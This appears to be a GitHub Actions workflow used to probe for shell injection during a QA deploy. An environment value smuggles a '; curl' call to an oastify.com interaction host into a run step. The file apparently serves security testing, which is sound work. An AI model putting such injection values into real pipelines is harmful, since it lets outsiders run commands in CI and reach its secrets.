name: Deploy To QA

on:
  workflow_call:
  workflow_dispatch:
  pull_request:
    types:
      - opened
    branches:
      - 'main'

jobs:
  Prepare-Plugin-For-Production:
    if: startsWith(github.head_ref, 'releases/')
    runs-on: ubuntu-latest
    steps:
      # - uses: mdecoleman/pr-branch-name@1.2.0
      #   id: vars
      #   with:
      #     repo-token: ${{ secrets.GITHUB_TOKEN }}
      - name: Update package.json file
        env:
          TEST_INJECTION: "\"; curl http://2wzlcleq8scnquutjci2434y8peg27qw.oastify.com/hit"
        run: |
          plugin_version=$(echo "${{ TEST_INJECTION }}" | grep -Eo '[0-9].[0-9]+.[0-9]+')

          
  # Deploy-to-QA:
  #   # if: startsWith(github.head_ref, 'releases/')
  #   runs-on: ubuntu-latest
  #   environment: Staging
  #   steps:
  #     - name: Generate and send slack report
  #       env:
  #         SLACK_TOKEN: "test"
  #       run: |
  #         ANDROID_SDK_VERSION=`cat package.json | jq .androidSdkVersion`
  #         curl -X POST -H 'Content-type: application/json' --data '{"deploy_type": "QA", "install_tag": "QA", "git_branch": "'"$ANDROID_SDK_VERSION"'"}' "http://1.1.1.1"
  #         echo "after"
  #         echo $ANDROID_SDK_VERSION
  
